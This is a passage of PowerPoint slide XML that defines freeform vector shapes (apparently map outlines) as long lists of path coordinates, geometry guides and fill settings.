                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="118" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="151" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="155" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="222" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="213" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="209" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="206" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="192" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="143"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="167" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="165" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="160" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36394" name="Freeform 126"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3573" y="2193"/>
                <a:ext cx="225" cy="153"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 136 w 225"/>
                  <a:gd name="T1" fmla="*/ 136 h 153"/>
                  <a:gd name="T2" fmla="*/ 124 w 225"/>
                  <a:gd name="T3" fmla="*/ 127 h 153"/>
                  <a:gd name="T4" fmla="*/ 97 w 225"/>
                  <a:gd name="T5" fmla="*/ 106 h 153"/>
                  <a:gd name="T6" fmla="*/ 77 w 225"/>
                  <a:gd name="T7" fmla="*/ 99 h 153"/>
                  <a:gd name="T8" fmla="*/ 60 w 225"/>
                  <a:gd name="T9" fmla="*/ 95 h 153"/>
                  <a:gd name="T10" fmla="*/ 44 w 225"/>
                  <a:gd name="T11" fmla="*/ 98 h 153"/>
                  <a:gd name="T12" fmla="*/ 30 w 225"/>
                  <a:gd name="T13" fmla="*/ 111 h 153"/>
                  <a:gd name="T14" fmla="*/ 22 w 225"/>
                  <a:gd name="T15" fmla="*/ 103 h 153"/>
                  <a:gd name="T16" fmla="*/ 22 w 225"/>
                  <a:gd name="T17" fmla="*/ 88 h 153"/>
                  <a:gd name="T18" fmla="*/ 24 w 225"/>
                  <a:gd name="T19" fmla="*/ 79 h 153"/>
                  <a:gd name="T20" fmla="*/ 18 w 225"/>
                  <a:gd name="T21" fmla="*/ 72 h 153"/>
                  <a:gd name="T22" fmla="*/ 11 w 225"/>
                  <a:gd name="T23" fmla="*/ 73 h 153"/>
                  <a:gd name="T24" fmla="*/ 13 w 225"/>
                  <a:gd name="T25" fmla="*/ 68 h 153"/>
                  <a:gd name="T26" fmla="*/ 20 w 225"/>
                  <a:gd name="T27" fmla="*/ 68 h 153"/>
                  <a:gd name="T28" fmla="*/ 17 w 225"/>
                  <a:gd name="T29" fmla="*/ 61 h 153"/>
                  <a:gd name="T30" fmla="*/ 10 w 225"/>
                  <a:gd name="T31" fmla="*/ 59 h 153"/>
                  <a:gd name="T32" fmla="*/ 5 w 225"/>
                  <a:gd name="T33" fmla="*/ 55 h 153"/>
                  <a:gd name="T34" fmla="*/ 6 w 225"/>
                  <a:gd name="T35" fmla="*/ 44 h 153"/>
                  <a:gd name="T36" fmla="*/ 10 w 225"/>
                  <a:gd name="T37" fmla="*/ 40 h 153"/>
                  <a:gd name="T38" fmla="*/ 17 w 225"/>
                  <a:gd name="T39" fmla="*/ 43 h 153"/>
                  <a:gd name="T40" fmla="*/ 19 w 225"/>
                  <a:gd name="T41" fmla="*/ 40 h 153"/>
                  <a:gd name="T42" fmla="*/ 25 w 225"/>
                  <a:gd name="T43" fmla="*/ 44 h 153"/>
                  <a:gd name="T44" fmla="*/ 30 w 225"/>
                  <a:gd name="T45" fmla="*/ 43 h 153"/>
                  <a:gd name="T46" fmla="*/ 31 w 225"/>
                  <a:gd name="T47" fmla="*/ 41 h 153"/>
                  <a:gd name="T48" fmla="*/ 36 w 225"/>
                  <a:gd name="T49" fmla="*/ 38 h 153"/>
                  <a:gd name="T50" fmla="*/ 26 w 225"/>
                  <a:gd name="T51" fmla="*/ 27 h 153"/>
                  <a:gd name="T52" fmla="*/ 23 w 225"/>
                  <a:gd name="T53" fmla="*/ 17 h 153"/>
                  <a:gd name="T54" fmla="*/ 14 w 225"/>
                  <a:gd name="T55" fmla="*/ 14 h 153"/>
                  <a:gd name="T56" fmla="*/ 6 w 225"/>
                  <a:gd name="T57" fmla="*/ 21 h 153"/>
                  <a:gd name="T58" fmla="*/ 7 w 225"/>
                  <a:gd name="T59" fmla="*/ 32 h 153"/>
                  <a:gd name="T60" fmla="*/ 3 w 225"/>
                  <a:gd name="T61" fmla="*/ 25 h 153"/>
                  <a:gd name="T62" fmla="*/ 11 w 225"/>
                  <a:gd name="T63" fmla="*/ 12 h 153"/>
                  <a:gd name="T64" fmla="*/ 35 w 225"/>
                  <a:gd name="T65" fmla="*/ 14 h 153"/>
                  <a:gd name="T66" fmla="*/ 49 w 225"/>
                  <a:gd name="T67" fmla="*/ 32 h 153"/>
                  <a:gd name="T68" fmla="*/ 64 w 225"/>
                  <a:gd name="T69" fmla="*/ 31 h 153"/>
                  <a:gd name="T70" fmla="*/ 73 w 225"/>
                  <a:gd name="T71" fmla="*/ 18 h 153"/>
                  <a:gd name="T72" fmla="*/ 86 w 225"/>
                  <a:gd name="T73" fmla="*/ 11 h 153"/>
                  <a:gd name="T74" fmla="*/ 95 w 225"/>
                  <a:gd name="T75" fmla="*/ 9 h 153"/>
                  <a:gd name="T76" fmla="*/ 97 w 225"/>
                  <a:gd name="T77" fmla="*/ 0 h 153"/>
                  <a:gd name="T78" fmla="*/ 109 w 225"/>
                  <a:gd name="T79" fmla="*/ 8 h 153"/>
                  <a:gd name="T80" fmla="*/ 120 w 225"/>
                  <a:gd name="T81" fmla="*/ 14 h 153"/>
                  <a:gd name="T82" fmla="*/ 121 w 225"/>
                  <a:gd name="T83" fmla="*/ 23 h 153"/>
                  <a:gd name="T84" fmla="*/ 126 w 225"/>
                  <a:gd name="T85" fmla="*/ 32 h 153"/>
                  <a:gd name="T86" fmla="*/ 139 w 225"/>
                  <a:gd name="T87" fmla="*/ 33 h 153"/>
                  <a:gd name="T88" fmla="*/ 151 w 225"/>
                  <a:gd name="T89" fmla="*/ 37 h 153"/>
                  <a:gd name="T90" fmla="*/ 158 w 225"/>
                  <a:gd name="T91" fmla="*/ 54 h 153"/>
                  <a:gd name="T92" fmla="*/ 179 w 225"/>
                  <a:gd name="T93" fmla="*/ 75 h 153"/>
                  <a:gd name="T94" fmla="*/ 200 w 225"/>
                  <a:gd name="T95" fmla="*/ 87 h 153"/>
                  <a:gd name="T96" fmla="*/ 218 w 225"/>
                  <a:gd name="T97" fmla="*/ 95 h 153"/>
                  <a:gd name="T98" fmla="*/ 224 w 225"/>
                  <a:gd name="T99" fmla="*/ 103 h 153"/>
                  <a:gd name="T100" fmla="*/ 209 w 225"/>
                  <a:gd name="T101" fmla="*/ 109 h 153"/>
                  <a:gd name="T102" fmla="*/ 192 w 225"/>
                  <a:gd name="T103" fmla="*/ 123 h 153"/>
                  <a:gd name="T104" fmla="*/ 172 w 225"/>
                  <a:gd name="T105" fmla="*/ 141 h 153"/>
                  <a:gd name="T106" fmla="*/ 165 w 225"/>
                  <a:gd name="T107" fmla="*/ 150 h 153"/>
                  <a:gd name="T108" fmla="*/ 145 w 225"/>
                  <a:gd name="T109" fmla="*/ 150 h 153"/>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225"/>
                  <a:gd name="T166" fmla="*/ 0 h 153"/>
                  <a:gd name="T167" fmla="*/ 225 w 225"/>
                  <a:gd name="T168" fmla="*/ 153 h 153"/>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225" h="153">
                    <a:moveTo>
                      <a:pt x="137" y="147"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="128"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
